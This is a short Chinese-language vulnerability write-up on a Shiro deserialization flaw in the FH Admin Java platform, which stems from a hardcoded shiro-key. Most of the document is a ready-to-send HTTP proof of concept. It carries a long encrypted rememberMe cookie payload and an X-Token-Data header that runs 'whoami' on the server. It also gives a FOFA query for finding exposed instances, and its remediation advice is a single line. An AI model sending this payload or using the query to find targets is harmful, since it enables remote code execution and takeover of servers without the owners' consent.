0x01 产品简介
FH Admin 是一款 java 快速开发平台。
0x02 漏洞概述
FH Admin CMS 存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
0x03 复现环境
FOFA:app="FH-Admin"
0x04 漏洞复现
PoC
GET /appSysUser/registerSysUser.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Token-Data: whoami
Cookie: rememberMe=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
Accept-Encoding: gzip
Connection: close
0x05 修复建议
⼚商已发布了漏洞修复程序,请及时关注更新:http://www.fhadmin.org/
